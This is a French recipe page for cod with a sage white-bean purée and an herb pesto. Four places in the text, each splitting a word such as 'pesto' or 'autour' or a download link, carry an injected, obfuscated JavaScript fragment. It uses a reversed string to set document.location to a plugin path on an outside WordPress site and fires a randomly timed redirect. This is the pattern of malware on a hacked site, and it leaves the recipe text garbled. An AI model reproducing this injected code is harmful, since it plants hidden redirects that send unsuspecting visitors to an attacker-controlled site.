CABILLAUD ET PURÉE D’HARICOTS BLANCS A LA SAUGE

CABILLAUD ET PURÉE D’HARICOTS BLANCS A LA SAUGE

Pour 2 Pers.

INGRÉDIENTS :

– 2 pavés de cabillaud
– 1 grand bocal de haricots blancs
– Sauge séchée : 1 CC.
– 1 noix de beurre
– un peu de bouillon de poule ou de légumes
– herbes fraiches au choix (basilic, cerfeuil, etc…)
– 2 gousses d’ail
– huile d’olive
– sel/poivre


Assaisonner le poisson et le cuire a la vapeur, au micro-onde ou au four avec un filet d’huile


Chauffer dans une casserole le beurre avec la sauge & 1 gousse d’ail emincée. Quand il est fondu, rajouter les haricots blancs (garder quelques haricots pour décorer)) et chauffer l’ensemble.


Mixer les haricots en rajoutant du bouillon au fur et à mesure pour obtenir une purée lisse et onctueuse. Saler et poivrer.


Mixer les herbes (garder quelques feuilles pour décorer), la 2eme gousse d’ail, de l’huile d’olive, du sel & du poivre pour obtenir comme un “pestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to”.


Pour servir, dresser la purée au centre de l’assiette, poser le poisson dessus.


Disposer quelques haricots blanc en cercle autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour du poisson avec des herbes fraiches.


Rajouter le pestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to sur la garniture.


Bon appétit !

cabillaud et purée de haricots blancs à la saugetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton” download>Télécharger

Leave comments

Your email is safe with us.

Ce site est protégé par reCAPTCHA et le GooglePolitique de confidentialité etConditions d'utilisation appliquer.